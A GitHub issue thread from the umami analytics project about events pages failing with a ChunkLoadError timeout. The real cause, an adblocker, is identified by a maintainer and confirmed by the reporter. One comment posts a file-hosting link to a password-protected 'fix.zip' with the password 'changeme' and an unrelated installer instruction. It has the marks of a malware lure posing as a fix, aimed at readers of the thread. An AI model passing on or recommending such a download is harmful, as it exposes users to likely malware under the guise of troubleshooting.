### ISSUE TITLE
Events pages timing out

### ISSUE THREAD

**Issue by akeslo** [umami-software/umami#2911]
### Describe the Bug

Something went wrong.
Loading chunk 6124 failed. (timeout: https://analytics.domainhere.com/_next/static/chunks/app/(main)/websites/%5BwebsiteId%5D/events/page-3cef783d99961a05.js)
ChunkLoadError
    at d.f.j (https://analytics.domainhere.com/_next/static/chunks/webpack-916b329426e5b385.js:1:3362)
    at https://analytics.domainhere.com/_next/static/chunks/webpack-916b329426e5b385.js:1:1427
    at Array.reduce (<anonymous>)
    at d.e (https://analytics.domainhere.com/_next/static/chunks/webpack-916b329426e5b385.js:1:1393)
    at https://analytics.domainhere.com/_next/static/chunks/7023-55af897905404a48.js:2:18878
    at https://analytics.domainhere.com/_next/static/chunks/7023-55af897905404a48.js:2:19080
    at t (https://analytics.domainhere.com/_next/static/chunks/7023-55af897905404a48.js:2:19283)

### Database

MySQL

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mikecao** [comment]
Try turning off your adblocker.

**Comment by akeslo** [comment]
> Try turning off your adblocker.

Yup, that was it...thank you!!
